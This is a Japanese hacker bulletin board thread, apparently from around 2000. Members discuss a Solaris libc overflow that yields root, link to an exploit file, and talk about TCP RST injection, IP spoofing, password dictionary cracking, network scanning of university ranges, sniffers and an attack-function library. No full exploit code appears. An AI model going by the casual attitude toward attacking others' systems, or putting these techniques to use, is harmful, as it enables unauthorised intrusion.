| 【名 前】うさ 【タイトル】gateway 05/31 19:42 |
  |
| 【メッセージ】 ircのgateway作ってるんだけど、 日本語を打ちこむと回線が切断されてしまいます。 それもアプリが落ちるんじゃなくて、 gatewayサーバ側のマシンがいきなりFinパケット送ってくる。 なんなんだ・・・ 日本語コードの0x1bが問題とかそういうのあります? |
| 【名 前】UNYUN 【タイトル】更新報告 05/30 18:40 |
unewn4th@usa.net |
| 【メッセージ】 ex_admintool.c、前のはSolaris7でrootになれなかったんで、 Solaris7対応にしてます。 |
| 【名 前】bluecat 【タイトル】はじめまして 05/29 08:45 |
bluecat@love3.net |
| 【メッセージ】 役立ち関数見せていただいてます。 みなさん、さすがすごいですね。 私、熱出てきました(ふぅ)。 なにかと勉強不足なのを痛感いたしました。 こ〜んな関数を見た後でhtmlを見ると、なぜかほっとします(笑) RZさんのPREタグの後ろが黒くなるの件ですが、PREはテキストの整形なので 背景などは同じTRタグ内のBGCOLOR属性がそのまま指定されてしまうから ではないでしょうか。 後ろを白にするには、PREを別のTRで囲んだらいいかと思います。 でも私も今のがいい雰囲気でていて、かなりいい感じだと思いますが・・・。 最後になりましたが、体調をくずされているとの事、早く良くなるといいですね。 |
| 【名 前】UNYUN 【タイトル】ぐぐぐ 05/29 04:33 |
unewn4th@usa.net |
| 【メッセージ】 いぁ、どうも最近体調悪いっす。 @epermさん HP-UXですかー そりゃ、いいですねー。しかし、なんでもハカーにはふぁっくな UNIXらしいですが(笑)、ローカルに一台欲しいですねぇ。 @RZさん >フォームが崩れるのは仕方がないと割り切りましょう(笑) そうですね、ていうか関数用意する側も場合によっては 「こういうのも入れておいた方がいいかなぁ」っていうのが 出るかもしれないですし... でも、ある程度大きくなってきたら、統一する方向で行った 方がいいですね。 んで、すごーい大きくなったら本にしましょう(笑) >ところでPREタグの後ろが黒になるのは何故????? あ、でもアレの方がモニタ画面っぽい雰囲気が出てイイような 気がしますけど(笑) 白とかにせず、ソースん所はアレで行きましょーよー どないですか? 今、某仕事でちょい忙しくなってしまってますが、6月アタマ からダダーっと送りますんで、よろしくたのんます。 @Leethさん > そこで質問なんですけど、それでも辞書を使うということは > 結構意味のあるパスがつけられているということなのでしょうか? そういうことになりますね。 最近はpasswdコマンドとかも辞書持ってるやつもあって、 辞書に載ってるような簡単なコトバは弾かれたりするのもありますけど... それでも、イロイロとルールを組み合わせてクラックすれば、結構出て くるみたいですよ。 |
| 【名 前】Leeth 【タイトル】パス... 05/29 00:00 |
|
| 【メッセージ】 どうも、初めまして あの 最近思ったんですが、 UNIXのパスを手に入れたらパスクラックソフトを使いますよね あれで総当たりしても、ものすごい時間がかかるからしないですよね # まぁ、かなりたくさんのコンピーターがあればできるかもしれなけど で、辞書を使うんですが意味のないパスだったら当たらないし..... そこで質問なんですけど、それでも辞書を使うということは 結構意味のあるパスがつけられているということなのでしょうか? # それとも私の勘違いで、つかわれてないとか.... |
| 【名 前】RZ 【タイトル】re:(1)RE:UGライブラリ 05/28 21:26 |
http://www.ugtop.com/defcon0/index2.htm |
| 【メッセージ】 了解です。 フォームが崩れるのは仕方がないと割り切りましょう(笑) ところでPREタグの後ろが黒になるのは何故????? わけわからん。 わけわからんといえば if( sock = socket(なんたら) ) { perror( "socket" ); } なんつーコード書いてて これ実行すると、socket : Success ってでるのね。 なんだよーとか考えてて、よく見たらリターンコードのチェックじゃなかった(笑) エラー番号ぜろってOKのことなのね(笑) |
| 【名 前】eperm 【タイトル】Free UnixWare! 05/28 02:49 |
eperm@usa.net |
| 【メッセージ】 おひさしぶりです。 今月号のSoftware Designに"Free版 UnixWare7.1登場" とかいう記事が... とってもひかれてます。 最近、HP-UXのRootPasswd 教えてもらいました。 楽しいことができそうで...よだれがでます。 分厚いマニュアルが山ほどあるのがGoodですね。 |
| 【名 前】UNYUN 【タイトル】なんとも... 05/27 18:27 |
unewn4th@usa.nethttp://base.oc.to/skyscraper/byte/551/bbs/bbs.cgi?unewn |
| 【メッセージ】 日記帳にでも、お使い下さいませ... |
| 【名 前】UNYUN 【タイトル】RE:UGライブラリ 05/27 18:19 |
unewn4th@usa.net |
| 【メッセージ】 >アルゴリズム的なものって意味で。 >それから関数ヘッダもつけます? アルゴリズム、解説が必要な場合もありますね... どの程度必要かは、作った人で判断ってことにしますか? あと、ヘッダは、まぁ見て書いてくれということで...(手抜き? |
| 【名 前】RZ 【タイトル】UGライブラリ 05/26 16:19 |
http://www.ugtop.com/defcon0/making/function.htm |
| 【メッセージ】 ども。 ちょっとだけ手を加えてみました。 説明文は適当です(笑) ところで関数で何をやっているのかの説明も加えるべきですか? アルゴリズム的なものって意味で。 それから関数ヘッダもつけます? #PREタグの背景が黒になるのどうにかしたいなぁ・・・ |
| 【名 前】UNYUN 【タイトル】@〜 05/26 03:17 |
unewn4th@usa.net |
| 【メッセージ】 @TIPさん >めっきり、SSLのソースとかX.509とかにどっぷりです。 私の方は.... ここんとこ研究が本当は忙しいクセに、センセにウソついて 学会と論文はハッタリかまして逃げの体制に入ってます(笑) ていうか、画像処理は飽きました(笑) @blue3さん エディタはviに限るでしょう。 昔のHP(覚えてる人いるかなぁ)はviで書いてましたし。 ていうか、MS Wordよりイイ(笑) |
| 【名 前】UNYUN 【タイトル】>RZさん 05/26 03:06 |
unewn4th@usa.net |
| 【メッセージ】 例のスキャナ、なぜか動かなかったので、アルゴリズムを拝借して simple stealthに足して動かしてみました。 たしかに、”だー”っと言ったカンジで(笑)早いですね。 ウチの学科でテストしてるんですけど、外のテストがあんまり できないのが苦しい所です(笑) |
| 【名 前】reverse@vi使い 【タイトル】re:(2)あう 05/25 23:42 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 >無条件にRST受け入れるOSは多分ありません。 >TCPなので(笑) MSなら。。。仕様です、とか言って(笑) SEQインクリだしなぁ。 @UG-lib フォーマット作ってcgiでも別に良いと思いますけど。 作る手間がアレですけど。 なんにしろ、私の場合はコンテンツを書かなければ... |
| 【名 前】blue3 【タイトル】エディタ 05/25 22:56 |
roott@geocities.co.jp |
| 【メッセージ】 こんにちは。 みなさんエディタは何を使用してますか? VI, Emacs, 特にこだわりませんか? ふと思っただけです。 |
| 【名 前】TIP 【タイトル】TCPは 05/25 21:04 |
webmaster@filez.orghttp://filez.org |
| 【メッセージ】 mbuf.cを覗く毎日です。 うぅぅぅ |
| 【名 前】TIP 【タイトル】分散Webじゃぃ 05/25 21:03 |
webmaster@filez.orghttp://filez.org |
| 【メッセージ】 ここんとこ研究が忙しくなってきて めっきり、SSLのソースとかX.509とかにどっぷりです。 おまけで穴でも見つかれば幸せなかぁと思ってます。 |
| 【名 前】RZ 【タイトル】re:(1)あう 05/25 19:05 |
|
| 【メッセージ】 無条件にRST受け入れるOSは多分ありません。 TCPなので(笑) 必ず正しいSEQとACKが必要になります。 これがわかれば接続きれますけどね。 brkillとかあります。 |
| 【名 前】RZ 【タイトル】re:(1)UG-Lib. 05/25 19:03 |
|
| 【メッセージ】 まーそんなかんじですが。 動作確認OSとバージョンはどこにいれますか? あと現在はタテにずらずら並べていますが これをどうするかってのもあり。 要はhtmlの書き方が問題なわけで。 フォーマットつくってcgiから呼び出しでもいいんですけどね。 そーなるとファイルが散らかりまくりそーなのが恐い。 どうしましょかね。 後で一斉変換はきつそ。 |
| 【名 前】hsj 【タイトル】あう 05/25 18:11 |
hsj@geocities.co.jp |
| 【メッセージ】 @reverseさん すいません、ボケてました。 TCPなんで、元と先のアドレスとポート番号がわかれば どのコネクションに対するRSTなのかは特定できるんですね。 その上で、そのRSTを無条件で受け入れるかどうか、ってのはOSに依存すると。 ふむふむ・・・。 無条件で受け入れるOSなら、 あるホストからそのOSのホストの特定ポートへの接続を 接続元に化けて片っ端から切っていくと言うベタなDoSができちゃいますね。 #もしかして常識ですか? ##もう一回、RFCをちゃんと読んできます(汗) @RZさん、UNYUNさん UG-Lib面白そうですね〜 へぼいネタしか持ってないんですが(笑) 普段使っている、踏み台用selectループとかでもいいでしょうか? |
| 【名 前】UNYUN 【タイトル】UG-Lib. 05/25 17:35 |
unewn4th@usa.net |
| 【メッセージ】 @RZさん > 公開するの慎重になるなぁ。。。(笑) そうなんですよ(笑) 一度アップした後に、「あれはこうするべきだ」なんてのは しょっちゅうかも... ペンギンツールも、そういうのはいっぱいあります。 (めんどいので、なおしてないんですが...) @UG-Lib. Developper 雛形ですが、 ・バージョン ・動作確認OS ・(できれば)サンプルコード を入れると、更に使いやすいかと... この「アングラライブラリ計画」は、RZさんが管理して下さる とのことです。雛形の書式に則ったHTMLを添付してRZさん に送信すれば、追加してくれるとのことです。 (で、いいんですよね...?(汗 >RZさん) |
| 【名 前】TrainCrash 【タイトル】re:(2)Re:ターボリナックスが、、、 05/25 17:04 |
http://yokohama.cool.ne.jp/kt97526 |
| 【メッセージ】 >そうするとリナックスのIPが127.0.0.1となっていたのですが たぶんLinuxのOSのインストール時に聞かれたとおもうのです が...。設定してないならちゃんと設定してやりましょう。 もちろんローカルIPを指定してあげてくださいね。 (172.16.60.101とかね) |
| 【名 前】RZ 【タイトル】うーむ 05/25 16:15 |
|
| 【メッセージ】 関数化萌えですな。 おしゃれ.cのメイン部分がたったの44行になった(笑) |
| 【名 前】RZ 【タイトル】そういや 05/25 16:13 |
|
| 【メッセージ】 公開するの慎重になるなぁ。。。(笑) さっきもinit_rand_seed()作ってて、 やっぱinit_seedはtime()じゃなくてpidの方がいいかなーとか そもそも単語をアンダースコアで並べるより、 大文字小文字で区別する方がいいかなーとか、 困ったもんだ。 基本の書き方統一します? #ところでSolaris libcバグの盛り上りは凄いですね(笑) |
| 【名 前】RZ 【タイトル】>UNYUNさん 05/25 12:41 |
http://www.ugtop.com/defcon0/index.htm |
| 【メッセージ】 メールおくっときました。 とりあえずHedHatアイコンきぼん |
| 【名 前】UNYUN 【タイトル】re:(2)こんなの 05/25 03:15 |
unewn4th@usa.net |
| 【メッセージ】 >つうか、あの動物の絵はメンバーになると書いていただけるんですか? >その特典は大きいなぁ(笑) アイコンは必須でしょぅ?やっぱし。 ライブラリ構築の関係者は無条件でアイコンが付くことになります(笑) 拒否してもダメダメですぜ。ぅひひ.... |
| 【名 前】ロコ 【タイトル】すみません 05/24 23:21 |
takuou@anet.ne.jp |
| 【メッセージ】 変な風に改行をしてしまいました。 ゴメンナサイ m(__)m |
| 【名 前】reverse 【タイトル】re:(1)こんなの 05/24 23:17 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 対応OSとサンプル(是非...)を加えて完璧ですね! 小さいし分かりやすいと思います。 私の今やってるDNS関係も、出来たらまとめます(ちょろいけど)。 つうか、あの動物の絵はメンバーになると書いていただけるんですか? その特典は大きいなぁ(笑) |
| 【名 前】ロコ 【タイトル】ありがとうございました 05/24 23:16 |
takuou@anet.ne.jp |
| 【メッセージ】 UNYUN>ルート権限の件ありがとうございました。 ドキュメントのとこにある、オーバーフローも参考にさせ てもらいました。 そういえば研究室にIRIXマシンがあったので攻撃の 練習でもしてみたいと思います・・・・・・・・ |
| 【名 前】mai 【タイトル】Re: こんなの 05/24 22:59 |
|
| 【メッセージ】 触発されてsniff用socket作ってみた。 #ifndef __SOCK_SNIFF__ #define __SOCK_SNIFF__ int sock_sniff(char device); #endif ヘッダこれだけ。(笑) 実装もかなりシンプル。 10分くらいで小さいやつ沢山つくるってのも面白いかも。 思いつくままにちょろちょろ作ってみます。 |
| 【名 前】UNYUN 【タイトル】re:(1)こんなの 05/24 22:53 |
unewn4th@usa.net |
| 【メッセージ】 >とりあえず形だけ作ってみた。 >どない? あぁ、なるほど。 こうやって一個づつhtmlにして公開するというのは、新しいですね。 libcapなんかにはない、融通性があって便利ですな。 このフォーマットで行きましょ。 私もペンギンアイコンを用意します(笑) 一応、関数のアタマにバージョンを入れておいた方がいいかも。 バグ出す可能性アリなので>私(笑) とりあえず、プログラム組んでて、汎用的に使えそうなのが あったら、どんどんアップして行きます。 後で、メルしますね。 |
| 【名 前】Dylan!! 【タイトル】re:(1)Re:ターボリナックスが、、、 05/24 22:19 |
dylan@culture.club.ne.jp |
| 【メッセージ】 こんな質問に答えていただいてありがとうございます。>TrainCrashさん >ん?それはWindowsからTelnetしたんですか? そうなんです。WinからターボにTelnetしました。 >ちゃんとLinuxのIPを指定してやりましょう。 ローカルでつかうから最初の設定でIPを設定しなっかったのですが、 そうするとリナックスのIPが127.0.0.1となっていたのですが、、 そうするとリナックスのIPが127.0.0.1で、Winからつなごうと する127.0.0.1はWin自信につなぐようになってしまうということだから リナックスのIPを変更しなければならないと言うことですよね? うーん、奥が深いですね。もっと勉強します。 |
| 【名 前】TrainCrash 【タイトル】Re:ターボリナックスが、、、 05/24 21:43 |
http://yokohama.cool.ne.jp/kt97526 |
| 【メッセージ】 >テルネットで127.0.0.1と指定してやってみたら.... ん?それはWindowsからTelnetしたんですか? だとすると自分(今使用しているマシン)にTelnetしていることに なってます(笑)ちゃんとLinuxのIPを指定してやりましょう。 127.0.0.1は基本的に自分を指すことになります..でいいんですよね>ALL |
| 【名 前】RZ 【タイトル】こんなの 05/24 21:39 |
http://www.ugtop.com/defcon0/making/function.htm |
| 【メッセージ】 とりあえず形だけ作ってみた。 どない? あとアイコンで「凶悪」とか「DOS」とか「misc」とかわけるのもいいかもねん。 であ。 |
| 【名 前】Dylan!! 【タイトル】ターボリナックスが、、、 05/24 20:37 |
dylan@culture.club.ne.jp |
| 【メッセージ】 ターボ君がネットワークカードを認識してくれました(喜) これでノートパソコンのWin95と接続できる!!っと思いきや テルネットで127.0.0.1と指定してやってみたらつなげませんでした(泣) なんでだろう。まだ本買ってないからわかりませんです。 ターボ君のネットワークの設定とかで何かいい本ってありますか? そういえば今度の特命リサーチ200Xという番組で産業スパイを 特集するそうです。 産業スパイ、、、ひびきがいいですね。 でもテレビの番組だからどこまで突っ込むか疑問ですね。 期待して待っておこう!(笑) |
| 【名 前】UNYUN 【タイトル】libc 05/24 17:17 |
unewn4th@usa.net |
| 【メッセージ】 libc、Solaris7対応がBugtraqに公開されてます。 あと、回避法も公開されました。 全部のsuidプログラムのsuidビットを外してラッパ経由 で実行、ラッパで長い環境変数を弾くというものです。 引数or環境変数攻撃の臨時回避の代表的な最終手段です。 ちと強引なので不具合が出るかもしれませんが、やらない よりはマシです。 そのうちパッチが出ることでしょう。 まとめて、PenguinToolboxのAbstractに公開してます。 |
| 【名 前】UNYUN 【タイトル】re:(1)私通 失礼します。 05/24 17:08 |
unewn4th@usa.net |
| 【メッセージ】 >以前のお話ですが、話の続きをしたいので以前の私のICQまでご連絡く >ださい。お願いします。 おひさです。 了解しましたー |
| 【名 前】UNYUN 【タイトル】re:(2)ドメインについて 05/24 17:06 |
unewn4th@usa.net |
| 【メッセージ】 >正規手続きってのはだめ?>JPNICリスト あら、配布終了してたんですね。 何で公開するんだろ?とか思ってましたし(笑) >おれ取ってバラまこうかな(笑) いいっすねー。 ていうか、またJPNICに喧嘩売ってますね(笑) |
| 【名 前】0e 【タイトル】re:(1)ドメインについて 05/24 13:47 |
|
| 【メッセージ】 正規手続きってのはだめ?>JPNICリスト おれ取ってバラまこうかな(笑) |
| 【名 前】Yagi 【タイトル】私通 失礼します。 05/24 11:08 |
|
| 【メッセージ】 To:UNYUNさん おひさしぶりです。ようやく復活することができるようになりました。 以前のお話ですが、話の続きをしたいので以前の私のICQまでご連絡く ださい。お願いします。 |
| 【名 前】YU= 【タイトル】ドメインについて 05/24 07:54 |
|
| 【メッセージ】 UNYUNさん、お答えありがとうございました。 しかし、JPNICのDOMAINリストの配布が終了してしまっ たのです。それで、ほかの方法を探していたのですが、、、。 僕も自分で方法を考えてみます。ありがとうございました。 |
| 【名 前】UNYUN 【タイトル】れれれ 05/24 03:01 |
unewn4th@usa.net |
| 【メッセージ】 @maiさん 新生活って... う〜ん、何でしょう?(笑) 本当は、私も忙しいハズなんですけど、アングラに潜って 現実逃避してます... @YU=さん JPNICにあるリスト使えば効率的で手っとり早いと思います。 |
| 【名 前】UNYUN 【タイトル】re:(4)sun 05/24 02:48 |
unewn4th@usa.net |
| 【メッセージ】 なんか、libcの件で、かなーりメールが来てて、あやしい 外人たちとイロイロやってるんですが、どうもlibcもイロイロ とマイナーバージョンアップしてるらしく、環境によっては 公開しているexploitではrootになれないようです。 ただ、どのバージョンにも同様のセキュリティホールがあること は確実なようで、ちょっと変更すると動いたという報告もあります。 私のexploitは、/usr/lib/libc.so.1のファイルサイズが1000252byte のもの専用です。これが、Solaris2.6 for Sparcのディフォルト だと思われます。 SUNの担当は本物のダメダメ君で、「コンパイルできないのぉ」 とかホザいてますので、もう放っておくことにしました(笑) 今、fixの方法を何人かと議論してるんですが、結構大変です。 たぶん、libcのexecl()がLC_MESSAGESの処理やってて、そこで オーバーフローしてると思うんですが... だったらパッチが出るまでお手上げです。 うーん... |
| 【名 前】YU= 【タイトル】ドメイン逆引き? 05/24 01:03 |
|
| 【メッセージ】 はじめまして。いつもよらせていただいています。 質問なんですけど、スキャンのときとかに、例えば「ac.jp」の範囲 をスキャンしたいときとかには、どうやってその範囲のIPを調べれ ばいいのでしょうか。素人の質問で申し訳ありませんがよろしくお願 いします。 |
| 【名 前】mai 【タイトル】maiっす 05/23 13:33 |
|
| 【メッセージ】 どもお久しぶりっす。 4月入ってから新生活で忙しくてしばらくROMってました。 新しいネタ作る時間もなくて結構ツライっす・・・ amiの方は相当忙しいらしく、最近見かけないっす。 つーわけでamiかmaiかどっちか見かけたら、それほど忙しくない方だな、 と思ってください。(笑) またIRC来て下さいな。 |
| 【名 前】UNYUN 【タイトル】がぁぁぁ 05/23 02:37 |
unewn4th@usa.net |
| 【メッセージ】 しまったぁ!>IRC さっき、隣の部屋のマシンの/usr/lib/libc.so.1をブッ壊してしまって(笑) 修復作業してましたです。 2倍速CDでの起動はキツイです、こういう時... どうせまた壊すので/sbinにcp作って入れとこっと。 ところでmaiさん、おひさですねー でも、maiさんとamiさん、区別がつきにくいです(笑) IRC、また誘ってくだされ。 ネコネタも新しいのありますし(死 |
| 【名 前】mai 【タイトル】irc 05/23 02:22 |
|
| 【メッセージ】 >v6とトンプウソウがテーマでした。笑い あとスニフとNFSね(笑) |
| 【名 前】うさぎ 【タイトル】むむ 05/23 02:14 |
|
| 【メッセージ】 一人しか来なかった。 maiだけだ(笑) つーしょっとだ。 v6とトンプウソウがテーマでした。笑い |
| 【名 前】うさぎ 【タイトル】irc 05/23 01:26 |
|
| 【メッセージ】 #augc にてスタンバイ。 2時マデ待ちます。 |
| 【名 前】UNYUN 【タイトル】re:(1)ども 05/22 22:35 |
unewn4th@usa.net |
| 【メッセージ】 >うにゅんさん、スキャナ改良版おくりました。 どもども、着弾確認しました。 早速ソース読んで実験してみます。 あ、あとでメルもしときますので。 |
| 【名 前】RZ 【タイトル】ども 05/22 17:27 |
|
| 【メッセージ】 うにゅんさん、スキャナ改良版おくりました。 苦労して読んで下さい。笑い いやぁ、我ながらきったねーーーソース。わはは つぎはぎ萎えヽ(;´ー`)ノ |
| 【名 前】UNYUN 【タイトル】re:(3)sun 05/22 10:43 |
unewn4th@usa.nethttp://BASE.OC.TO/skyscraper/byte/551/tools/ex_sh.c |
| 【メッセージ】 SUNは、公開するなとは言わなかったです。 http://BASE.OC.TO/skyscraper/byte/551/tools/ex_sh.c にアップします。 ただ、結構不安定らしく、rootになれたというのと、なれないという 報告があります。 原因は不明ですが、調査します。なんか、環境の問題でしょうかね。 私んとこでは、2台で確認しました。 |
| 【名 前】UNYUN 【タイトル】re:(2)sun 05/22 02:20 |
unewn4th@usa.net |
| 【メッセージ】 これ、LC_MESSAGEを処理するlibcのバグですね。 /bin/shよりもっと下層ですな。 ライブラリレベルのバグなら、もうちょい出るかも... |
| 【名 前】UNYUN 【タイトル】re:(1)sun 05/22 01:51 |
unewn4th@usa.net |
| 【メッセージ】 UKのsun社員が、チャンスをくれって言ってたような気が... 一応、SUNに報告はしました。 向こうは仕事してるはずなんですが、何も連絡が来ない ので、公開してもイイということでしょうかね... こんだけ立て続けに問題が出たら、もうSolaris使うのが コワイですよ。マジで。 だいたい、execlでsh経由でコールされたあとに、呼ばれた プログラム上で落ちるなんて問題ありすぎですよ。 IRIXも/bin/shでオーバーフローしますが、コール時に落ちる ようで、即rootには結びつきにくいと思いますし... ちょろっとやってみただけでも、passwd、su、rlogin、rcp使って rootになれました... これ、よく考えたら、全部のsuidプログラムのパーミッションを 変更するわけにもいかないし、/bin/shを削除するわけにも いかないし... パッチが出てなかったら、どうしようもなく 致命的ですね。 |
| 【名 前】reverse 【タイトル】sun 05/22 00:55 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 /etc/passwdってシェル制限とかでも使われるのに... それは、ちょっと重要すぎる事態ですね。 UKのsun社員が、チャンスをくれって言ってたような気が... @hsj そうなんですか? 教科書にはRSTフラグを受け取ったホストは、すぐそのコネクション切断の動作に入る と書いてあるんですが。 |
| 【名 前】UNYUN 【タイトル】まじでやばい穴 05/21 21:36 |
unewn4th@usa.net |
| 【メッセージ】 またセキュリティホール、発見かも(笑) Solaris2.6 for Sparcですけど、 すべてのsuidプログラムが危険です。 バグなんてないだろーと思われる /etc/passwdでrootになれま した。原因は /bin/shのバグです。 これ、結構シャレにならんですね。 あとで、アップします。 |
| 【名 前】UNYUN 【タイトル】わひー!!! 05/21 21:25 |
unewn4th@usa.net |
| 【メッセージ】 >ゆっくりとせめてみますわ(笑) ナ、ナニヲ...(汗 >ソースにはおれの固定IP書きこんでるので >めんどくせーから詳細は月曜あたりで。 お、月曜日ですかー ユビキリげんまんですよ(笑) >めんどくせーからターゲットをハックしたいよ(笑) くーーー!!!(笑) たしかに欲しぃ時が、ちらほらと... おっと、いかんいかん(笑) |
| 【名 前】0e 【タイトル】re:(1)んでも 05/21 21:18 |
|
| 【メッセージ】 めんどくせーからターゲットをハックしたいよ(笑) まじで。 |
| 【名 前】0e 【タイトル】んでも 05/21 21:17 |
|
| 【メッセージ】 Spoofできず。。 キャプチャーつうか、スニファーなんて役に立たないねマジで。 ゆっくりとせめてみますわ(笑) ソースにはおれの固定IP書きこんでるので めんどくせーから詳細は月曜あたりで。 てゆーかできねーー>spoof |
| 【名 前】UNYUN 【タイトル】re:(1)できた 05/21 18:47 |
unewn4th@usa.net |
| 【メッセージ】 >いんたぁねっと上に存在する最も遅いサーバを見つけるツール(笑) >sping.cて名前をつけました。 だははは。 面白いもん作りましたね(笑) ACKとかを開いてそうなポートにダーっと飛ばしてRST待つ とかですか? あのスキャナ、高速だからClassCとかならアッという間ですね。 それにしても、そんな遅いのは初めて聞きましたよ(笑) ホントにどこほっつき歩いてるんだか... >ちょと直して公開しようかな 見たい、ていうか使ってみたいですねー ソースも見たいし... |
| 【名 前】0い 【タイトル】re:(1)できた 05/21 17:13 |
|
| 【メッセージ】 最高記録更新。 192.194.190.74 : 6468 ms おっせー(笑) |
| 【名 前】0e 【タイトル】できた 05/21 16:58 |
|
| 【メッセージ】 いんたぁねっと上に存在する最も遅いサーバを見つけるツール(笑) sping.cて名前をつけました。 てゆーか、以前の高速スキャンを流用したから ソースが汚いのなんのって・・・ しかもipヘッダ決め付けだし(笑) ちょと直して公開しようかな。 しかし、pingで1000以上って結構ありますねぇ ここまで来るとネットワーク障害てゆーんでわ。笑い いまんとこ最低速は3928ms(笑) |
| 【名 前】UNYUN 【タイトル】re:(1)対応の速さに驚きましたね 05/21 13:22 |
unewn4th@usa.net |
| 【メッセージ】 >最近はもっぱら生回りなので某V氏のように海外の得体の >しれぬところへ行ってDosアタック食らっちゃいました。 うはは。 私も生ばっかなんで、DoSはおろか、私のSolarisは かなーり強烈なブルートを喰らったりしてます(笑) ログ整理がたまったもんじゃないので、これはある意味DoSですね。 今度来たら入れてあげようとかと(死 |
| 【名 前】レナ・ランフォード/Shutdown 【タイトル】対応の速さに驚きましたね 05/21 12:47 |
rena@infovlad.nethttp://cgi.shutdown.server.ne.jp/renalanford.html |
| 【メッセージ】 うーん やっぱし噂はかねがねですかな(爆) さっそくのリンクありがとうございます。 最近はもっぱら生回りなので某V氏のように海外の得体の しれぬところへ行ってDosアタック食らっちゃいました。 うーん、かなりきついっす(笑) (プロクシにはアクセスパターン記録されるから 串使うときは必ずランチャ使います) |
| 【名 前】UNYUN 【タイトル】どもー 05/21 11:31 |
unewn4th@usa.net |
| 【メッセージ】 PenguinToolbox、レイアウトを再構築しましていみました。 一応、外人向けな感じで行ってみようかと... いやぁ、適当に作ってみたんですが、後で読んでみると なんともアヤシイ英語だなぁ。 日本人は、英語んとこ読まないでください(笑) @TIPさん こんちわー。 丸くなったBBS、なんとか混乱しなくなりました。 いやあ、あれには参りました(笑) あと、referenceネタ、楽しみにお待ちしてまする〜 @レナさん お初です。 いぁ、お噂はかねがね... ウチからもリンクさせて頂きますです。 |
| 【名 前】レナ・ランフォード/Shutdown 【タイトル】私も事後承諾になりますが 05/21 09:50 |
rena@infovlad.nethttp://cgi.shutdown.server.ne.jp/renalanford.html |
| 【メッセージ】 某けつくら管理人で番号フェチな野郎です。 事後承諾ですがリンクしておきます。 |
| 【名 前】TIP 【タイトル】リンクーー(><) 05/21 02:11 |
tip@ijk.comhttp://filez.org |
| 【メッセージ】 リンクさせていただきまーす(事後報告) と思っていましたら、リンクしていただいてたんですね(^^ ありがとうございますーーー。 こちらもリンクしましたぁん。 また、1冊ええかんぁと思う本をみつけたので reviewを後ほど送ります。 |
| 【名 前】hsj 【タイトル】re:(7)ども 05/20 20:53 |
hsj@geocities.co.jp |
| 【メッセージ】 こんにちは。 @0eさん >0e(でポストしたっけ(笑)) (笑) IBM −> HALみたいなモンですか? >なにいってんですかー、あるでしょ。 あ、書き方まずかったですね。 Spoofing自体の事ではなくて ホンモノホストがターゲットに近い場合に、 (ホンモノホストを)黙らせないままソイツに化けると、 ニセモノホストが投げたデータにターゲットがACKを返す前に ホンモノホストのRSTが割り込んでくると思われるので 成功しにくい −> 使い道がない? ってコトだったです。 #あぁ、コレも解りにくいなぁ(笑) ただ、成功しにくいから使い道がない、って考えはおかしいですね。 使い道はあるけど成功しにくい、ですね。 ・・・墓穴。 ニホンゴ不自由ですみません(笑) @reverseさん >セッションを閉じておく必要があると思います。 んーと、サーバがニセモノホストからのデータに対してACKをカウントしてしまうと、 ホンモノホストからのRSTは逆にサーバに認証されないって事にはなりませんか? #確証無し 仮にこうなるとすると、セッション閉じる事はないかも。 #データを投げるたびにホンモノホストに謎のACKが行くとは思いますが(笑) @UNYUNさん >サイト用リンク シュールでカッコイイです(笑) しかし皆さんハイセンスですね。 いいなぁ・・・。 |
| 【名 前】0e 【タイトル】re:(6)ども 05/20 15:29 |
|
| 【メッセージ】 ぅぉ、すっげー こういうサイズでみんながロゴつくって ずらずらと動物を並べるのもいいですね(笑) てゆーかロボなのか。。ギュオンギュオンですね。わはは うちのページにもはっておきます。 でわ作成開始 |
| 【名 前】UNYUN 【タイトル】re:(5)ども 05/20 06:28 |
unewn4th@usa.net |
| 【メッセージ】 >出来てからひそかにポストします(笑) また〜(笑) あ、それとあのお尋ね者ペンギンは、ここの色にあわないような気がし たので、Penguin Members'のサイト用リンクを付けてみました。 Rorrimさんは、かぶとえびね。 どっかの「カブトエビ観察日記」みたいなページからぱちくってきました(笑) 夏休みの宿題も、ここで有効利用させてもらってます。 ありがとう>見知らぬ人 んで、RZさんは、やっぱしウサギですね(笑) あれから、ヤクザウサギを探したのですが、なかったです。 仕方ないので、かぁいー普通のやつです。 でも、アレはロボットなのですよ... 目からレーザー出ます。 しまいには爆発します。そういう、危ないウサギです(笑) キュートでしょう? あと、Linkページを再構築しました。 ぐだぐだになってます。 |
| 【名 前】0e 【タイトル】re:(4)ども 05/20 02:53 |
|
| 【メッセージ】 よくよく考えたらけっこうしょぼいかもなので 出来てからひそかにポストします(笑) でわヽ( ´ー`)ノ |
| 【名 前】reverse 【タイトル】re:(3)ども 05/20 01:25 |
esrever |
| 【メッセージ】 質問ですけど、分からないです!OS依存のような気もします。 ただ、RSTパケット(かな?)が投げられるので、 それまでにすべての処理を終わらせセッションを閉じておく必要があると思います。 マキシマム セキュリティにも「なるすますマシンを麻痺させる」ってありますし、多分そうです。 正直、そこら辺のデータ、ルータを挟んで遅延のある時のデータ、とか調べたいんですけどね... > 「固定データのみの送信で終了する」モノが。 r? |
| 【名 前】UNYUN 【タイトル】re:(1)ルート権限について 05/20 00:33 |
unewn4th@usa.net |
| 【メッセージ】 >三角関数でエラーが出てまだわかってません・・・・ (1) Oeさんが言ってるようにmath.hがincludeされてるか確認 (2) gcc program.c -lm で、数学関数ライブラリを指定 これでエラーが出るなら、どっかおかしいです。 >ルート権限で動いているプログラムを乗っ取ればいい。 ええと、これはremote overflow exploitとかの場合ですね。 inetd.confを見れは一目瞭然ですが、ftpdとかは普通root 権限で動作してますので、こういうプログラムに異常な プロトコルを送ってstack overflowを起こすようなバグが 内包されてると、あふれたstackにretアドレスやらアヤシイ コードやらを書いておくと、root権限で何でもできる可能性 があります(overflowバグがあってもすべてうまく行く訳では ないですが)。 そのコード次第で、passwdにエントリーを追加したり、/.rhosts を+ +にしたり、shellコマンドを実行させたり... 色々できますね。 そういうことです。 localだと対象はsuidプログラムになるので、「root権限で動い ているプログラム」というより、「root権限で動作するプログラム」 ですね。 >ところで、コメントって DEF CON ZEROの方でも >書いてありましたっけ? いえ。 わたしが、フォトショッピングしました(笑) |
| 【名 前】UNYUN 【タイトル】re:(3)ども 05/20 00:20 |
unewn4th@usa.net |
